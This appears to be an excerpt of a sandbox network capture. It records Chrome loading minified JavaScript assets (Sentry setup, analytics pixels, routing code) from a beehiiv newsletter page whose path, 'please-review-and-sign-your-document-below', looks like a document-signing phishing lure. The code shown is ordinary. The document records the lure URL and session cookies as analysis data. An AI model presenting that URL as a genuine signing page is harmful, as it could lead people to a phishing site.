                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8ba2de48c95-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 64 37 37 64 31 38 35 2d 36 64 36 65 2d 35 35 35 35 2d 62 32 30 31 2d 30 37 30 64 34 65 36 31 63 64 37 32 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fd77d185-6d6e-5555-b201-070d4e61cd72")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC578INData Raw: 2e 70 61 74 68 6e 61 6d 65 2b 6e 2e 73 65 61 72 63 68 2c 63 3d 6e 2e 73 65 61 72 63 68 2e 69 6e 63 6c 75 64 65 73 28 22 76 65 72 73 69 6f 6e 3d 64 72 61 66 74 22 29 3b 65 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 21 74 26 26 63 26 26 73 28 22 2e 22 2c 7b 72 65 70 6c 61 63 65 3a 21 30 7d 29 7d 2c 5b 73 2c 74 2c 63 5d 29 3b 63 6f 6e 73 74 20 72 3d 65 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 28 69 2c 7b 72 65 70 6c 61 63 65 3a 21 30 7d 29 7d 2c 5b 73 2c 69 5d 29 3b 72 65 74 75 72 6e 20 65 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 6d 3d 3e 7b 63 6f 6e 73 74 7b 64 61 74 61 3a 61 7d 3d 6d 3b 61 3f 2e 70 75 62 6c 69 63 61 74 69 6f 6e 49 64 3d 3d 3d 75 26 26 74 26 26 28 61 3f 2e 73 74 61 74 75
                                                                                                                                            Data Ascii: .pathname+n.search,c=n.search.includes("version=draft");e.useEffect(()=>{!t&&c&&s(".",{replace:!0})},[s,t,c]);const r=e.useCallback(function(){s(i,{replace:!0})},[s,i]);return e.useEffect(()=>{const o=m=>{const{data:a}=m;a?.publicationId===u&&t&&(a?.statu


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            115192.168.2.1649842104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC839OUTGET /assets/root-C5Mn_uH-.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC916INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 101490
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"18c72-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4165
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8ba6a7c0f60-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC453INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 34 35 32 34 33 61 35 66 2d 33 62 39 31 2d 35 31 32 31 2d 62 31 61 37 2d 61 61 32 37 39 31 65 32 39 64 38 64 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="45243a5f-3b91-5121-b1a7-aa2791e29d8d")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 69 51 71 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 54 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 78 32 64 61 5f 7a 63 76 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 67 20 61 73 20 5f 65 2c 61 4f 20 61 73 20 6c 74 2c 63 20 61 73 20 63 74 7d 66 72 6f 6d 22 2e 2f 41 70 70 47 6c 6f 62 61 6c 73 2d 32 42 72 2d 38 62 5a 73 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 43 20 61 73 20 62 65 2c 75 20 61 73 20 64 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 44 54 74 75 49 6a 7a 2d 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 4e 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 67 20 61 73 20 6d 74 2c 77 20 61 73 20 75 74 2c 5f 20 61 73 20 68 74 2c 75 20 61 73 20 49 2c 4d 20 61 73 20 78 74 2c
                                                                                                                                            Data Ascii: iQq.js";import{c as T}from"./index-x2da_zcv.js";import{g as _e,aO as lt,c as ct}from"./AppGlobals-2Br-8bZs.js";import{C as be,u as dt}from"./index-DTtuIjz-.js";import{u as N}from"./useTranslation-CfKJAmGY.js";import{g as mt,w as ut,_ as ht,u as I,M as xt,
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 73 22 3b 69 6d 70 6f 72 74 7b 5f 20 61 73 20 54 65 7d 66 72 6f 6d 22 2e 2f 64 69 61 6c 6f 67 2d 43 74 70 48 76 76 66 44 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 50 20 61 73 20 4f 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 70 6e 46 78 4f 61 61 63 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 61 20 61 73 20 42 74 2c 4c 20 61 73 20 44 74 2c 50 20 61 73 20 7a 74 7d 66 72 6f 6d 22 2e 2f 50 61 67 65 50 72 6f 76 69 64 65 72 2d 75 4b 78 6f 69 4e 64 6c 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4d 20 61 73 20 71 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 49 78 42 62 6e 66 2d 51 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 55 65 7d 66 72 6f 6d 22 2e 2f 75 73 65 49 73 4d 6f 62 69 6c 65 2d 6f 6e 45 75 75 4d 46 56 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 74 20 61 73 20 67 65 7d 66 72
                                                                                                                                            Data Ascii: s";import{_ as Te}from"./dialog-CtpHvvfD.js";import{P as Ot}from"./index-pnFxOaac.js";import{a as Bt,L as Dt,P as zt}from"./PageProvider-uKxoiNdl.js";import{M as qt}from"./index-IxBbnf-Q.js";import{u as Ue}from"./useIsMobile-onEuuMFV.js";import{t as ge}fr
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 4a 74 28 7b 67 65 74 4b 65 79 3a 74 2c 2e 2e 2e 73 7d 29 7b 6c 65 74 7b 69 73 53 70 61 4d 6f 64 65 3a 61 7d 3d 6d 74 28 29 2c 6e 3d 71 28 29 2c 72 3d 73 74 28 29 3b 75 74 28 7b 67 65 74 4b 65 79 3a 74 2c 73 74 6f 72 61 67 65 4b 65 79 3a 46 65 7d 29 3b 6c 65 74 20 6f 3d 69 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 63 3d 74 28 6e 2c 72 29 3b 72 65 74 75 72 6e 20 63 21 3d 3d 6e 2e 6b 65 79 3f 63 3a 6e 75 6c 6c 7d 2c 5b 5d 29 3b 69 66 28 61 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 6c 3d 28 28 63 2c 64 29 3d 3e 7b 69 66 28 21 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 73 74 61 74 65 7c 7c 21 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 73 74 61 74 65 2e 6b 65 79 29 7b 6c 65 74 20 75
                                                                                                                                            Data Ascii: Jt({getKey:t,...s}){let{isSpaMode:a}=mt(),n=q(),r=st();ut({getKey:t,storageKey:Fe});let o=i.useMemo(()=>{if(!t)return null;let c=t(n,r);return c!==n.key?c:null},[]);if(a)return null;let l=((c,d)=>{if(!window.history.state||!window.history.state.key){let u
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 2c 22 73 65 72 76 69 63 65 57 6f 72 6b 65 72 22 69 6e 20 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 73 65 72 76 69 63 65 57 6f 72 6b 65 72 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6f 6e 74 72 6f 6c 6c 65 72 63 68 61 6e 67 65 22 2c 72 29 2c 6e 2e 63 75 72 72 65 6e 74 26 26 28 6e 2e 63 75 72 72 65 6e 74 3d 21 31 29 7d 7d 2c 5b 73 5d 29 7d 63 6f 6e 73 74 20 58 74 3d 28 7b 6d 61 6e 69 66 65 73 74 55 72 6c 3a 74 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 77 65 62 6d 61 6e 69 66 65 73 74 22 7d 29 3d 3e 61 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 6e 6b 22 2c 7b 72 65 6c 3a 22 6d 61 6e 69 66 65 73 74 22 2c 68 72 65 66 3a 74 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 51 74 28 74 2c 2e 2e 2e 73 29 7b 63 6f 6e 73 74
                                                                                                                                            Data Ascii: ,"serviceWorker"in navigator&&navigator.serviceWorker.removeEventListener("controllerchange",r),n.current&&(n.current=!1)}},[s])}const Xt=({manifestUrl:t="/manifest.webmanifest"})=>at.createElement("link",{rel:"manifest",href:t});function Qt(t,...s){const
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 61 2e 61 73 79 6e 63 3d 21 30 2c 61 2e 73 72 63 3d 60 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 24 7b 74 7d 60 2c 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 63 6f 6e 73 74 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6e 2e 61 73 79 6e 63 3d 21 30 2c 6e 2e 69 64 3d 22 67 61 2d 70 69 78 65 6c 22 2c 6e 2e 69 6e 6e 65 72 48 54 4d 4c 3d 60 0a 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61
                                                                                                                                            Data Ascii: ument.createElement("script");a.async=!0,a.src=`https://www.googletagmanager.com/gtag/js?id=${t}`,document.head.appendChild(a);const n=document.createElement("script");n.async=!0,n.id="ga-pixel",n.innerHTML=` (function(){try{ window.dataLa
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 3d 60 0a 20 20 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e
                                                                                                                                            Data Ascii: =` (function(){try{ (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.asyn
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 29 7b 74 2e 70 75 73 68 28 5b 65 5d 2e 63 6f 6e 63 61 74 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 29 29 29 7d 7d 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 74 74 71 2e 6d 65 74 68 6f 64 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 74 74 71 2e 73 65 74 41 6e 64 44 65 66 65 72 28 74 74 71 2c 74 74 71 2e 6d 65 74 68 6f 64 73 5b 69 5d 29 3b 74 74 71 2e 69 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 74 71 2e 5f 69 5b 74 5d 7c 7c 5b 5d 2c 6e 3d 30 3b 6e 3c 74 74 71 2e 6d 65 74 68 6f 64 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 74 71 2e 73 65 74 41 6e 64 44 65 66 65 72 28 65 2c 74 74 71 2e 6d 65 74 68 6f 64 73 5b 6e 5d 29 3b 72 65 74 75 72 6e
                                                                                                                                            Data Ascii: ){t.push([e].concat(Array.prototype.slice.call(arguments,0)))}};for(var i=0;i<ttq.methods.length;i++)ttq.setAndDefer(ttq,ttq.methods[i]);ttq.instance=function(t){for(var e=ttq._i[t]||[],n=0;n<ttq.methods.length;n++)ttq.setAndDefer(e,ttq.methods[n]);return
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20 20 2f 2f 20 49 6e 73 65 72 74 20 54 77 69 74 74 65 72 20 50 69 78 65 6c 20 49 44 20 61 6e 64 20 53 74 61 6e 64 61 72 64 20 45 76 65 6e 74 20 64 61 74 61 20 62 65 6c 6f 77 0a 20 20 20 20 20 20 20 20 74 77 71 28 27 69 6e 69 74 27 2c 27 24 7b 74 7d 27 29 3b 0a 20 20 20 20 20 20 7d 63 61 74 63 68 7b 2f 2a 73 77 61 6c 6c 6f 77 20 65 78 63 65 70 74 69 6f 6e 2a 2f 7d 7d 29 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 60 2c 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 7d 7d 63 61 74 63 68 7b 7d 7d 2c 5b 74 2c 73 5d 29 2c 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 58 28 29 7b 63 6f 6e 73 74 5b 74 2c 73 5d 3d 69 2e 75 73 65 53 74 61 74 65 28
                                                                                                                                            Data Ascii: document,'script'); // Insert Twitter Pixel ID and Standard Event data below twq('init','${t}'); }catch{/*swallow exception*/}})(); `,document.head.appendChild(n)}}catch{}},[t,s]),null};function X(){const[t,s]=i.useState(
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 65 65 68 69 69 76 5f 68 6f 6e 65 79 3b 6c 65 74 20 62 3d 21 4d 2c 52 3d 21 4d 3b 4d 26 26 28 62 3d 4d 26 26 43 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 43 29 3f 2e 6d 61 72 6b 65 74 69 6e 67 7c 7c 21 31 3a 21 28 4d 26 26 21 43 29 2c 52 3d 4d 26 26 43 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 43 29 3f 2e 64 61 74 61 50 72 6f 63 65 73 73 69 6e 67 7c 7c 21 31 3a 21 28 4d 26 26 21 43 29 29 3b 63 6f 6e 73 74 20 47 3d 61 3f 2e 66 61 63 65 62 6f 6f 6b 5f 70 69 78 65 6c 2c 48 3d 61 3f 2e 74 77 69 74 74 65 72 5f 70 69 78 65 6c 2c 57 3d 61 3f 2e 74 69 6b 74 6f 6b 5f 70 69 78 65 6c 2c 73 65 3d 61 3f 2e 67 6f 6f 67 6c 65 5f 61 6e 61 6c 79 74 69 63 73 5f 70 69 78 65 6c 2c 4f 3d 61 3f 2e 67 6f 6f 67 6c 65 5f 61 6e 61 6c 79 74 69 63 73 5f 34 5f 70 69 78 65 6c 2c 42 3d 61 3f 2e 67
                                                                                                                                            Data Ascii: eehiiv_honey;let b=!M,R=!M;M&&(b=M&&C?JSON.parse(C)?.marketing||!1:!(M&&!C),R=M&&C?JSON.parse(C)?.dataProcessing||!1:!(M&&!C));const G=a?.facebook_pixel,H=a?.twitter_pixel,W=a?.tiktok_pixel,se=a?.google_analytics_pixel,O=a?.google_analytics_4_pixel,B=a?.g


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            116192.168.2.1649843104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC554OUTGET /assets/XMarkIcon-Y2tO3Ykg.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC896INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 837
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"345-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8ba9ab841fe-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC473INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 37 63 35 31 37 64 31 2d 39 62 66 65 2d 35 66 32 31 2d 38 38 33 39 2d 32 32 36 61 62 32 36 33 61 33 38 39 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="07c517d1-9bfe-5f21-8839-226ab263a389")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC364INData Raw: 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 74 7d 2c 6f 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 74 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 4d 36 20 31 38 20 31 38 20 36 4d 36 20 36 6c 31 32 20 31 32 22 7d 29 29 7d 63 6f 6e 73 74 20 69 3d 65 2e 66 6f 72 77 61 72 64 52 65 66 28 61 29 3b 65 78 70 6f
                                                                                                                                            Data Ascii: oke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M6 18 18 6M6 6l12 12"}))}const i=e.forwardRef(a);expo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            117192.168.2.1649845104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC556OUTGET /assets/useIsMobile-onEuuMFV.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC896INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 710
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
